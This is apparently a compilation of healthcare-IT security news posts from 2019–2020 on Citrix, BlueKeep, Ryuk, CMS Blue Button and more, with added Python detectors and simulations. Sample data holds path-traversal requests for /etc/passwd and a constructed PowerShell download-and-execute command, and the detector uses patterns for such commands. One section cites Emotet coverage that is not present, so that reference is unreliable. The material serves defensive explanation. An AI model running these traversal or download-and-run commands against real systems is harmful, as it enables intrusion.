The advisory, issued on January 8, 2020, urges all organizations using the vulnerable Citrix appliances (formerly NetScaler ADC and NetScaler Gateway) to implement mitigations immediately to limit the possibility of an attack, and to apply the firmware updates as soon as they are released later this month.

Two proof-of-concept exploits have been published on GitHub, making exploitation trivial. Scanning for vulnerable systems has increased since Project Zero India and TrustedSec published their exploits on Friday, and attacks on honeypots set up by security researchers became more frequent over the weekend.

Around the world, roughly 80,000 organizations in 158 countries need to implement mitigations; around 38% of the vulnerable organizations are in the U.S.A.

The vulnerability affects versions 13.0, 12.1, 12.0, 11.1, and 10.5 of Citrix Application Delivery Controller and Citrix Gateway, including the former NetScaler ADC and NetScaler Gateway products.

Security researcher Mikhail Klyuchnikov discovered the path traversal bug and reported it to Citrix. A vulnerable appliance can be exploited over the internet without authentication: all an attacker needs to do is locate a vulnerable appliance and send it a specially crafted request carrying the exploit code. Researchers on cybersecurity forums have nicknamed the bug Shitrix.

At the time of writing, no patch is available. Citrix plans to issue firmware upgrades by the end of the month on the following schedule:

  • January 20, 2020 for firmware versions 11.1 and 12.0
  • January 27, 2020 for versions 12.1 and 13.0
  • January 31, 2020 for version 10.5

In the meantime, it is important to apply configuration changes that make exploitation more difficult. These are detailed in Citrix Support article CTX267679.

Because the vulnerability is being actively exploited, organizations should also check, after applying the mitigations, whether the flaw has already been exploited on their appliances.

TrustedSec, which withheld its PoC exploit code until another exploit appeared on GitHub, has released a tool for identifying vulnerable Citrix hosts and has shared possible indicators of compromise for Citrix hosts.
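Since the bug is a path traversal reachable without authentication, one practical way to check whether an appliance has already been probed is to pull traversal attempts out of its web access logs. The following is an added example written for this article, not TrustedSec's tool and not Citrix's guidance: it decodes each request path (including double-encoded `%252e%252e`), flags any request that carries a `..` segment, works out where the request actually resolved, and records whether it climbed out of the web root. The log lines are constructed for the example in the common "combined" format; the paths in them are made up and are not Citrix-specific indicators of compromise.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined format). The request paths are
# invented for this example and are not CVE-2019-19781 indicators.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Jan/2020:03:14:02 +0000] "GET /vpn/index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Jan/2020:03:14:05 +0000] "GET /vpn/../../etc/passwd HTTP/1.1" 403 0 "-" "curl/7.64"
198.51.100.9 - - [11/Jan/2020:03:15:40 +0000] "POST /portal/%2e%2e/admin/config HTTP/1.1" 200 0 "-" "python-requests/2.22"
198.51.100.9 - - [11/Jan/2020:03:15:41 +0000] "GET /static/%252e%252e/secrets.txt HTTP/1.1" 404 0 "-" "python-requests/2.22"
192.0.2.4 - - [11/Jan/2020:03:16:00 +0000] "GET /vpn/logo.png HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(path: str, rounds: int = 3) -> str:
    """Undo percent-encoding repeatedly so double-encoded dots are caught as well."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def resolve_request_path(path: str):
    """If the path contains a '..' segment, return where it resolves and whether
    it tried to climb above the root; otherwise return None."""
    decoded = fully_decode(path.split("?", 1)[0])
    segments = decoded.split("/")
    if ".." not in segments:
        return None
    stack, escapes_root = [], False
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                escapes_root = True      # more '..' than directories to pop
        else:
            stack.append(seg)
    return {
        "target": "/" + "/".join(stack),
        "escapes_root": escapes_root,
        "double_encoded": "%25" in path.lower(),
    }


def find_traversals(log_text: str) -> list:
    """Return one record per request that carried a traversal sequence."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = resolve_request_path(m["path"])
        if verdict:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                         "path": m["path"], **verdict})
    return hits


if __name__ == "__main__":
    for hit in find_traversals(SAMPLE_LOG):
        print(f'{hit["ip"]:14s} {hit["status"]} {hit["path"]} -> {hit["target"]}'
              f'{"  (escapes root)" if hit["escapes_root"] else ""}')
```

A legitimate browser normalizes `..` before sending a request, so a literal or percent-encoded `..` in a server-side log is almost always a scanner or exploit attempt; the ones worth chasing first are those that returned 200 rather than 403 or 404.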

DHS Warns of Retaliatory Cyberattacks Because of the U.S. Drone Strike

The U.S. Department of Homeland Security has issued a warning about possible retaliatory cyberattacks following the U.S. military strike in Iraq that killed Iran's leading general, Major General Qasem Soleimani.

The U.S. Department of Defense stated that General Soleimani was actively developing plans to attack American diplomats and service members in Iraq and across the region. President Trump said in a tweet after the strike that the action was taken to stop a war, not to start one.

Iran condemned the attack, and its supreme leader, Ayatollah Ali Khamenei, vowed "forceful revenge" on the United States. The U.S. State Department has instructed all Americans in Iraq to leave the country for their safety, and on Sunday the Iraqi parliament voted to expel all U.S. troops from the country.

There are fears that Iran's reprisals will take place in cyberspace rather than on the ground, with U.S. corporations, government institutions, and critical infrastructure as potential targets. Iran's conventional military power is relatively limited, but it is highly capable of carrying out destructive cyberattacks.

Threat actors associated with the Iranian government have long conducted cyberattacks in the U.S., but the nature of the attacks could now change. Iran has built an array of offensive cyber capabilities and has carried out destructive attacks in the past. Notably, Iran-linked actors used the Shamoon wiper malware against the Saudi Arabian oil giant Aramco in 2012, and they are believed to have developed other wiper variants that could be deployed against American targets. Iran has also been linked to the SamSam ransomware attacks, including the attack on the City of Atlanta.

Acting DHS Secretary Chad Wolf said that no specific, credible threats against the United States have been identified to date. DHS will continue to monitor the situation and work with local, state, and federal partners to ensure the safety of the American public.

It is not known whether or when attacks will come, but local, state, and federal leaders have been advised to take the necessary precautions. Chris Krebs, Director of DHS' Cybersecurity and Infrastructure Security Agency, said it is time to brush up on Iranian tactics, techniques, and procedures (TTPs), pay close attention to your systems, particularly ICS, and make sure third-party access is being watched as well.

Krebs also referenced a warning he issued in June that CISA was aware of a recent rise in malicious cyber activity directed at U.S. businesses and government agencies by Iranian regime actors and proxies. The intelligence community and cybersecurity partners are monitoring Iranian cyber activity, sharing information, and taking steps to keep America and its allies safe.

FBI Warning and Recommendations Concerning the LockerGoga and MegaCortex Ransomware Attacks

The FBI has issued a TLP:Amber alert in response to an increase in cyberattacks using the MegaCortex and LockerGoga ransomware variants. The threat actors behind these variants target large enterprises and typically deploy the ransomware a few months after compromising a network.

The first detected LockerGoga attack was in January 2019, while MegaCortex first appeared in May 2019. The two variants share the same indicators of compromise (IoCs) and the same command-and-control (C2) infrastructure, and both are used in attacks on large enterprise networks.

Known LockerGoga attacks include those on the American chemical firms Hexion and Momentive, the aluminum and energy company Norsk Hydro, and the engineering consultancy Altran Technologies. MegaCortex has been used in attacks on the accounting software company Wolters Kluwer and the cloud hosting provider iNSYNQ. The threat actors are careful and methodical, and they try to cause maximum damage so that victims are more likely to pay the ransom, which often amounts to hundreds of thousands of dollars.

According to the FBI warning, initial compromise is achieved through a variety of methods, including phishing, exploitation of unpatched vulnerabilities, SQL injection, brute force attacks on RDP, and the use of stolen credentials. After gaining access, the attackers run batch files to kill processes and services used by security solutions in order to hide their presence. They move laterally to compromise as many devices as possible using the Cobalt Strike penetration testing framework, living-off-the-land Windows binaries, and tools such as Mimikatz. A beacon is planted on every compromised device and used to run PowerShell scripts, escalate privileges, and spawn a new session that acts as a listener on the victim's network.

Unlike many other threat actors who deploy ransomware soon after compromising a system, the actors behind these attacks often wait a couple of months before triggering the encryption routine. Exactly what they do during that time is not known, but it is likely used to steal sensitive data. The ransomware is deployed in the final stage of the attack, once the attackers have taken everything of value from the victim.

The FBI offered standard advice for strengthening defenses against ransomware and other cyberattacks. The following cybersecurity best practices should be implemented:

  • back up data regularly
  • store copies of backups on devices that are not connected to the network
  • test backups to confirm that files can be recovered
  • set strong passwords
  • patch promptly
  • enable multi-factor authentication, particularly on administrator accounts
  • ensure RDP servers can only be accessed through a VPN
  • disable SMBv1
  • scan for open ports and close or block those that are not needed

The FBI also recommends auditing newly created accounts and monitoring Active Directory for changes to authorized users; enabling PowerShell logging and monitoring for unusual commands, including the execution of Base64-encoded PowerShell; and ensuring that only the most recent version of PowerShell is installed.
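The FBI's advice to watch for Base64-encoded PowerShell applies equally to the Emotet macros described earlier on this page, which also launch PowerShell to fetch their payload. The detection below is an added example, not code from the FBI alert or from any product: it takes a process-creation command line, recognizes the `-EncodedCommand` switch and the abbreviations powershell.exe accepts for it, decodes the Base64 UTF-16LE script text, and then checks both the raw command line and the decoded script against a small set of indicator patterns. The indicator list is an illustrative choice, and the three command lines it runs against are constructed for the example, not taken from a real incident.

```python
import base64
import re

# Illustrative indicator patterns (an assumption of this example, not an
# exhaustive or authoritative list).
SUSPICIOUS = {
    "invoke-expression": re.compile(r"invoke-expression|\biex\b", re.I),
    "web-download": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I),
    "nested-base64": re.compile(r"frombase64string", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-noni\b|bypass", re.I),
}


def is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts -EncodedCommand, -e, -ec, and any unambiguous prefix such as -enc."""
    if not token or token[0] not in "-/":
        return False
    t = token[1:].lower()
    return t in ("e", "ec") or (len(t) >= 2 and "encodedcommand".startswith(t))


def decode_encoded_command(blob: str):
    """-EncodedCommand carries Base64 of the UTF-16LE script text; None if it is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Report whether the command line used an encoded command, what it decoded
    to, and which indicator patterns fired on the raw or decoded text."""
    tokens = cmdline.split()
    result = {"encoded": False, "decoded": None, "indicators": []}
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            decoded = decode_encoded_command(tokens[i + 1])
            if decoded is not None:
                result["encoded"] = True
                result["decoded"] = decoded
                break
    # The encoded script hides what runs; the switches around it (-nop -w hidden)
    # are visible in the raw command line, so scan both.
    text = cmdline + "\n" + (result["decoded"] or "")
    result["indicators"] = [name for name, rx in SUSPICIOUS.items() if rx.search(text)]
    return result


def encode_for_powershell(script: str) -> str:
    """Produce the same encoding an attacker (or an admin) would pass to -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation command lines for this example (not real telemetry).
SAMPLE_EVENTS = [
    r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\nightly-backup.ps1",
    "powershell.exe -nop -w hidden -enc " + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage2.ps1')"),
    "powershell.exe -EncodedCommand " + encode_for_powershell("Get-Date"),
]


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        verdict = analyze_command_line(event)
        print(f'encoded={verdict["encoded"]!s:5} indicators={verdict["indicators"]}')
        if verdict["decoded"]:
            print("   decoded:", verdict["decoded"])
```

Encoded commands are not malicious in themselves (the third sample is a harmless `Get-Date`), so the decoded content, not the mere presence of the switch, is what should drive alerting; the script-block logging the FBI recommends gives the same visibility for scripts that never pass through the command line at all.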

PHI of 10,000 Medicare Beneficiaries Exposed Due to CMS Blue Button 2.0 Coding Bug

The Centers for Medicare and Medicaid Services (CMS) has discovered a bug in its Blue Button 2.0 API that compromised the protected health information (PHI) of 10,000 Medicare beneficiaries. CMS has temporarily suspended access to the Blue Button API while it investigates and conducts an extensive code review. It is not yet known when the Blue Button 2.0 service will resume.

On December 4, 2019, a third-party application partner notified CMS of a data anomaly in the Blue Button API. CMS confirmed the issue and promptly halted access to the affected system while it investigated.

CMS traced the anomaly to a coding bug that could cause data to be shared with the wrong Blue Button 2.0 applications and the wrong beneficiaries. CMS confirmed that 30 applications were affected.

Medicare beneficiaries use the Blue Button platform to allow third-party apps, services, and research systems to access their claims data. A CMS identity management system identifies each user by a randomly generated unique user ID, which is what ensures that the right beneficiary's claims data is shared with the right third-party app.

The bug in Blue Button 2.0 truncated the 128-bit user ID to 96 bits, and the 96 bits that were kept were not random. As a result, the same truncated user ID was assigned to multiple beneficiaries, and the claims data of beneficiaries sharing a truncated ID within the identity management system was passed to other users and applications through Blue Button 2.0.
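The failure is easy to reproduce once the ID has structure. The simulation below is an added example, not CMS code, and the 128-bit layout it uses is an assumption made for illustration (CMS has not published its token format): the high 96 bits are an issuer field, an enrollment day and reserved zeros, and all of the randomness lives in the low 32 bits, which is exactly the portion a "keep the high 96 bits" truncation discards. The `uniqueness_report` function is the kind of validation check the page says was never run against the identity management system's tokens.

```python
import random
from collections import defaultdict

# Constructed 128-bit user ID layout for this example. It is NOT CMS's actual
# token format; it just has the property CMS described: every random bit sits
# in the portion the truncation throws away.
#   bits 127..112  issuing-system identifier (16 bits, constant)
#   bits 111..80   enrollment day number     (32 bits, shared by everyone enrolled that day)
#   bits  79..32   reserved, always zero     (48 bits)
#   bits  31..0    random                    (32 bits)
ISSUER = 0x0C4D


def issue_user_id(enrollment_day: int, rng: random.Random) -> int:
    return (ISSUER << 112) | (enrollment_day << 80) | rng.getrandbits(32)


def truncate_to_96_bits(user_id: int) -> int:
    """The buggy path: keep the high 96 bits, discarding the low 32 (the only random ones)."""
    return user_id >> 32


def group_by_key(users: dict, key_fn) -> dict:
    """Map each lookup key to the beneficiaries it resolves to. More than one
    beneficiary per key means one person's claims can be served to another."""
    groups = defaultdict(list)
    for beneficiary, user_id in users.items():
        groups[key_fn(user_id)].append(beneficiary)
    return groups


def uniqueness_report(users: dict, key_fn) -> dict:
    """Validation check: does the key the system actually uses still identify one person?"""
    groups = group_by_key(users, key_fn)
    colliding = {k: v for k, v in groups.items() if len(v) > 1}
    return {
        "beneficiaries": len(users),
        "distinct_keys": len(groups),
        "beneficiaries_sharing_a_key": sum(len(v) for v in colliding.values()),
        "largest_group": max((len(v) for v in colliding.values()), default=1),
    }


def simulate(n_beneficiaries: int = 1000, n_days: int = 10, seed: int = 2019) -> tuple:
    """Issue IDs for a constructed population and compare full vs truncated keys."""
    rng = random.Random(seed)  # seeded only so the demo repeats; a real issuer uses a CSPRNG
    users = {f"beneficiary-{i:04d}": issue_user_id(18_000 + i % n_days, rng)
             for i in range(n_beneficiaries)}
    full = uniqueness_report(users, lambda uid: uid)
    truncated = uniqueness_report(users, truncate_to_96_bits)
    return full, truncated


if __name__ == "__main__":
    full, truncated = simulate()
    print("full 128-bit IDs:    ", full)
    print("truncated 96-bit IDs:", truncated)
```

With the full ID every beneficiary gets a distinct key; after truncation 1,000 beneficiaries collapse onto 10 keys, one per enrollment day, so a claims lookup for any of them returns a group of 100. Note that 96 bits would have been plenty if they had been the random ones; the bug is not the length but which bits survived, which is why a test that only checks ID length would not have caught it.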

What the mistake was, and why it led to the impermissible disclosure of claims data, was clear. What was initially unclear was how the bug had been introduced and why it had not been caught before sensitive beneficiary data was exposed.

The preliminary investigation findings highlight three points, concerning testing, code reviews, and cross-team collaboration.

According to the CMS investigation, the bug was introduced on January 11, 2018. Code changes are normally subjected to a thorough review, but no comprehensive review was performed in January. Had one been performed, CMS would probably have identified and fixed the bug before any sensitive data was disclosed.

CMS tests Blue Button 2.0 using synthetic data to confirm functionality, which ensures that no PHI is put at risk. The integration of Blue Button 2.0 with other systems was not tested, in order to safeguard PHI; as a result, no testing was performed when it was integrated with the identity management system.

CMS notes that a separate identity management team maintains the code that generates the user ID token. The Blue Button 2.0 team assumed the token worked correctly and did not validate it. With better collaboration between the teams, both would have had the information they needed when making decisions.

CMS has already taken steps to prevent further errors. A stronger check and validation process is now in place, and the Blue Button 2.0 team will conduct thorough reviews of all new code so that coding errors are identified and corrected before changes go live. Blue Button 2.0 will now retain full user IDs rather than truncated IDs.

A complete platform review is under way, and the API will remain suspended until the code review is complete.

CMS will also conduct a detailed analysis to determine the potential impact on beneficiaries and decide what further steps are needed to protect them, such as offering credit monitoring services.

Bug in Ryuk Ransomware Decryptor Could Cause Permanent Loss of Data

The cybersecurity company Emsisoft has issued an alert about a recently identified bug in the decryptor that Ryuk ransomware victims use to recover their data. The bug can corrupt some files, resulting in permanent data loss.

Ryuk is a highly active ransomware variant that has been used extensively in attacks on U.S. healthcare organizations, including Alabama-based DCH Health System and the IT service provider Virtual Care Provider.

Ryuk ransomware is deployed in several different ways:

  • scanning for open Remote Desktop Protocol (RDP) ports
  • brute force attacks on RDP
  • downloading the ransomware through unpatched vulnerabilities
  • installing Ryuk as a secondary payload via Trojans such as TrickBot

There is no free decryptor for Ryuk, so recovery depends on whether the organization has viable backups; if not, victims have little choice but to pay a large ransom to obtain the decryption keys.

After paying the ransom, victims receive a decryptor application together with the keys needed to decrypt their files. However, the decryptor does not recover every file: large files may be corrupted during the decryption process.

The cause is a recent change to the encryption routine. Ryuk no longer encrypts the whole of any file larger than 54.4 megabytes. The change was intended to speed up encryption so that the attack is less likely to be noticed before file encryption completes.

Because of the bug, the decryptor miscalculates the footer of large files, truncating them and losing the last byte. For many file types this does not matter, because the last byte contains only padding and no data. Some file types do use the last byte, however, including Oracle database files and virtual disk files (VHD/VHDX). Losing the last byte of these files leaves them corrupted and unrecoverable.

In addition, the decryptor deletes the original encrypted file once it considers the file successfully decrypted, even when decryption has actually corrupted it. Once the decryptor has run, corrupted files therefore cannot be recovered.

It is essential to make a copy of all encrypted files before attempting decryption. Decryptors do not always work as intended and may result in the loss of some files; with copies of the encrypted files, a failed decryption can be retried. Emsisoft can help victims recover their files by building a Ryuk decryptor that does not have the bug. Because of the engineering effort involved, this bug-free decryptor is a paid service.
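The two failure modes above, a footer miscalculation that drops the last byte and a decryptor that deletes the ciphertext on the strength of its own verdict, can be shown together on a toy format. The following is an added example built for this article; the container format, threshold and single-byte XOR "cipher" are constructed stand-ins and are not Ryuk's real format or Emsisoft's tool. It contrasts a decryptor with an off-by-one in its footer handling against a correct one, and shows a recovery routine that keeps a copy of the ciphertext and checks the restored length against the footer before it will delete anything.

```python
import shutil
import struct
import tempfile
from pathlib import Path

# Constructed toy format (not Ryuk's): files above THRESHOLD have only their
# first HEAD_LEN bytes transformed, then a footer is appended:
#   magic (4 bytes) | original length (8 bytes, little-endian)
THRESHOLD = 1024
HEAD_LEN = 256
MAGIC = b"TOYF"
FOOTER = struct.Struct("<4sQ")
KEY = 0x5A  # one-byte XOR stands in for real encryption; XOR is its own inverse


def _transform(data: bytes, full: bool) -> bytes:
    limit = len(data) if full else HEAD_LEN
    return bytes(b ^ KEY for b in data[:limit]) + data[limit:]


def encrypt(plain: bytes) -> bytes:
    return _transform(plain, full=len(plain) <= THRESHOLD) + FOOTER.pack(MAGIC, len(plain))


def _parse_footer(blob: bytes) -> int:
    magic, orig_len = FOOTER.unpack(blob[-FOOTER.size:])
    if magic != MAGIC:
        raise ValueError("missing footer")
    return orig_len


def decrypt_fixed(blob: bytes) -> bytes:
    orig_len = _parse_footer(blob)
    return _transform(blob[:len(blob) - FOOTER.size], full=orig_len <= THRESHOLD)


def decrypt_buggy(blob: bytes) -> bytes:
    """Same as decrypt_fixed except the footer is counted one byte too large,
    so the last data byte of every file is dropped."""
    orig_len = _parse_footer(blob)
    return _transform(blob[:len(blob) - FOOTER.size - 1], full=orig_len <= THRESHOLD)


def recover_file(encrypted_path: Path, decrypt_fn, backup_dir: Path) -> bool:
    """Copy the ciphertext aside, decrypt, verify against the footer, and only
    then delete the encrypted original. Returns True if the file verified."""
    backup_dir.mkdir(parents=True, exist_ok=True)
    shutil.copy2(encrypted_path, backup_dir / encrypted_path.name)
    blob = encrypted_path.read_bytes()
    expected_len = _parse_footer(blob)
    plain = decrypt_fn(blob)
    encrypted_path.with_suffix("").write_bytes(plain)  # e.g. disk.vhd.toy -> disk.vhd
    if len(plain) != expected_len:
        return False  # leave the ciphertext in place so a fixed decryptor can retry
    encrypted_path.unlink()
    return True


def demo() -> dict:
    # Constructed "virtual disk": the final byte is a checksum, so losing it corrupts the file.
    body = bytes((i * 37) % 251 for i in range(4095))
    vhd_like = body + bytes([sum(body) % 256])
    blob = encrypt(vhd_like)
    buggy = decrypt_buggy(blob)
    with tempfile.TemporaryDirectory() as tmp:
        enc = Path(tmp) / "disk.vhd.toy"
        enc.write_bytes(blob)
        verified = recover_file(enc, decrypt_buggy, Path(tmp) / "backup")
        backup_kept = (Path(tmp) / "backup" / "disk.vhd.toy").exists()
        original_kept = enc.exists()
    return {
        "fixed_roundtrip": decrypt_fixed(blob) == vhd_like,
        "orig_len": len(vhd_like),
        "buggy_len": len(buggy),
        "buggy_verified": verified,
        "ciphertext_backup_kept": backup_kept,
        "encrypted_original_kept": original_kept,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:25s} {v}")
```

The length check in `recover_file` is deliberately independent of the decryptor's own opinion of success: the real decryptor's mistake was trusting its output and deleting the only copy of the input, and any recovery wrapper should refuse to do that until the output has been checked against something the decryptor did not compute.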

The List of Top 25 Most Dangerous Software Vulnerabilities Now Updated

The U.S. Department of Homeland Security's Homeland Security Systems Engineering and Development Institute (HSSEDI) has released an updated list of the 25 most dangerous software vulnerabilities, the first update in 8 years.

The Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Vulnerabilities list was created in 2011. It serves as a tool for improving cybersecurity resilience and is useful to software developers, security researchers, testers, customers, and educators because it offers insight into the most common and dangerous weaknesses in software.

The analysts who originally compiled the list used a subjective approach, interviewing security researchers and surveying industry experts, to assess weaknesses. HSSEDI, which is operated by MITRE, instead used a data-driven approach based on real-world vulnerabilities reported by security researchers. This method yields a more consistent and repeatable analysis that reflects the problems seen in the real world.

Some 25,000 vulnerabilities recorded in the National Vulnerability Database over the past two years were evaluated and ranked. The new approach takes into account how often each weakness occurs, its severity, the likely damage, and the probability of exploitation. Although many weaknesses were considered, those with low impact or that are rarely exploited were omitted from the list.

Before the update, Improper Neutralization of Special Elements used in an SQL Command (SQL injection) was at the top of the list. In the revised list it is only sixth. The change in position does not mean the severity of SQL injection has changed; it still has the highest severity score, 9.129 out of 10. Its overall score is 24.54 out of 100 because of the other factors, such as frequency of occurrence and of exploitation.

Now in first place is Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119), with an overall score of 75.56/100 and a severity score of 8.045/10. This weakness occurs where software performs operations on a memory buffer but can read from or write to memory outside the bounds of that buffer. That can allow operations to be performed on memory locations associated with other variables, data structures, or internal program data, which can result in remote execution of arbitrary code, modification of control flow, or crashes.

In second place is Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting, CWE-79). Its severity score of 5.778/10 is relatively low, but its overall score is 45.69/100 because of its high likelihood of exploitation, its frequency in reports, and the fact that exploitation allows attackers to execute unauthorized code.

In third place is Improper Input Validation (CWE-20), with an overall score of 43.61/100. It scores highly because of its high likelihood of exploitation and potential for harm. Its severity score is 7.242/10, and it can be exploited to execute unauthorized code, cause denial of service, and read or modify memory.

The updated list is available on MITRE's website.

Microsoft Gives Another Warning to Patch BlueKeep Vulnerability

Microsoft has issued another warning about patching the BlueKeep vulnerability (CVE-2019-0708). Prompt patching has been urged since a mass attack exploiting the flaw began on October 23.

The attack was not discovered until November 2, the delay in part due to the attacker's inability to exploit the vulnerability reliably. The campaign appears to have come from a low-skilled threat actor who intended to use the vulnerability to install cryptocurrency mining malware. Microsoft has now issued another warning that worse is to be expected.

The first mass exploitation attempt received a great deal of media attention, but it does not appear to have had much effect on the urgency of patching. A SANS Institute scan showed that the rate of patching did not materially change after the attacks. Although the number of unpatched devices has steadily declined since Microsoft released the patch in May, a huge number of devices remain vulnerable to BlueKeep attacks.

Although the attack was large in scale, it had little success: the exploit used did not work correctly, and in most cases the targeted machines simply crashed. A skilled threat actor who exploited the vulnerability successfully could connect to a vulnerable device over RDP without any user interaction and execute code on it, allowing the attacker to access, change, and steal data, install malware, and launch attacks on other unpatched devices on the network, including those that are not exposed to the internet.

In 2017, security researcher Marcus Hutchins found and activated a 'kill switch' that limited the damage caused by the WannaCry ransomware. He now warns that a ransomware attack could cause major disruption even without a worm, since a large proportion of the vulnerable devices are servers.

Microsoft has warned that while the BlueKeep attacks seen so far have had little effect, a far more dangerous exploit could be developed and used in a large-scale attack on vulnerable devices. Microsoft is telling customers to identify and update all vulnerable systems immediately.

IDenticard PremiSys Access Control System Vulnerabilities Found

ICS-CERT has issued a warning about three high-severity vulnerabilities in the IDenticard PremiSys access control system. All versions of the PremiSys software prior to version 4.1 are affected.

Successful exploitation could give an attacker full administrative access to the system, allow the theft of sensitive information contained in backups, and expose stored data. The vulnerabilities can be exploited remotely and require a low level of skill to exploit. Details of the vulnerabilities have been publicly disclosed.

The most serious vulnerability, CVE-2019-3906, concerns hard-coded credentials that grant full administrative access to the PremiSys WCF Service endpoint. Successful exploitation would give an attacker complete administrative access to the system. The vulnerability has been assigned a CVSS v3 base score of 8.8.

User credentials and other sensitive data stored by the system are encrypted, but a weak encryption method is used that could potentially be cracked, resulting in the disclosure and theft of information. This vulnerability (CVE-2019-3907) has been assigned a CVSS v3 base score of 7.5.

Backup files are saved by the system as encrypted zip files, but the password needed to open the backups is hard-coded and cannot be changed. An attacker who obtains the backup files could view and steal the information they contain. This vulnerability (CVE-2019-3908) has been assigned a CVSS v3 base score of 7.5.

The flaws were discovered and reported by Jimi Sebree of Tenable.

IDenticard has addressed the hard-coded credentials vulnerability (CVE-2019-3906); users should update the software to version 4.1 to resolve it. IDenticard is developing a fix for the other two flaws, and a software update addressing them is due for release in February 2019.

As an interim mitigation, NCCIC advises restricting and monitoring access to port 9003/TCP, placing the system behind a firewall, and ensuring the access control system is not accessible from the Internet. If remote access is required, secure methods such as an up-to-date VPN should be used.

Apple IOS Vulnerability Allows Hackers to Spy on FaceTime Calls

A serious Apple iOS vulnerability has been discovered that lets a caller access both the microphone and the front-facing camera of an Apple device by exploiting a flaw in FaceTime. The flaw grants microphone and camera access even if the call is not answered, prompting several security experts to advise Apple device owners to stop using FaceTime until it is fixed.

To exploit the flaw, a user calls another iOS device via FaceTime and, before the call is answered, adds themselves as an additional participant in a Group FaceTime call. Once that happens, the called party's microphone is activated and the caller can hear what is happening in the room, even though the call has not been answered.

If the called party dismisses the call by pressing the power button, the front-facing camera is also activated, giving the caller video as well as audio.

Security experts warn that regardless of whether the call is answered, simply calling someone makes it possible to hear what is going on in the room and see everything in the camera's field of view. While this may merely be unsettling for some FaceTime users, it could also cause serious harm: compromising footage could be recorded and used for extortion.

Several instances of the bug being triggered have been posted on social media, and it is clear that the vulnerability is being actively abused. Apple is aware of the problem and has stated that a fix will be released later this week. Until then, Apple device owners are advised to disable FaceTime in the device settings; with FaceTime disabled, the vulnerability cannot be exploited.

0Patch Micropatches Issued to Address 3 Zero-Day Windows Bugs

0Patch has released micropatches for three zero-day Windows bugs that Microsoft has yet to fix, including a remote code execution vulnerability in the Windows Contacts app.

The 0Patch platform allows micropatches to be quickly distributed and applied to, or removed from, running processes without restarting the computer or even the process. The platform is still in beta, although testing and fine-tuning are nearly complete. 0Patch has already released several micropatches for zero-day vulnerabilities in Microsoft products to help organizations mitigate them temporarily until a full patch is released.

The latest round of fixes addresses three recently discovered vulnerabilities in Microsoft products.

The first patch addresses a flaw dubbed AngryPolarBear, discovered by the security researcher SandboxEscaper, who published a proof-of-concept exploit in December. The vulnerability does not allow remote code execution, but an attacker could use it to overwrite key system files, which could be used in denial-of-service attacks.

The vulnerability allows a local unprivileged process to have a chosen system file on a vulnerable device overwritten in the context of Windows Error Reporting's handling of its XML file. The PoC replaces the XML file with a hard link to the chosen target. An attacker has little control over what is written to the file, but could exploit the flaw to corrupt the critical system file pci.sys and thereby prevent the system from booting. The micropatch prevents the XML file from being deleted.

The second patch addresses another vulnerability discovered by SandboxEscaper, dubbed readfile, for which a PoC exploit was also published in December. The vulnerability is in the Windows Installer and could allow an attacker to obtain sensitive information: it can be exploited by an unprivileged process to read arbitrary files, in the case of the PoC the desktop.ini file.

The third patch addresses a vulnerability in the Windows Contacts app which, if exploited, could lead to remote code execution on a vulnerable device. The flaw was discovered by ZDI researcher John Page, who reported it to Microsoft; the 90-day window for issuing a fix passed without one. Microsoft has stated that it will not be issuing a fix, so although micropatches are intended as temporary fixes, this one is likely to be permanent.

The vulnerability lies in the way .Contact and .VCF contact files are stored and processed on Windows Vista through Windows 10. It allows the creation of a contact file with a malicious payload in a sub-directory, which is executed when the user clicks the link in the contact file.

The micropatches are delivered via the 0Patch platform, which can be installed free of charge. They have been developed for Windows 10 and, for the second two vulnerabilities, Windows 7. 0Patch support should be contacted for patches for other vulnerable Windows versions.

Cryptocurrency Mining Malware Tops Most Wanted Malware List

Check Point's Most Wanted Malware report for December 2018 shows that cryptocurrency mining malware was the leading malware threat in December: the top four malware threats for the month were all cryptocurrency miners.
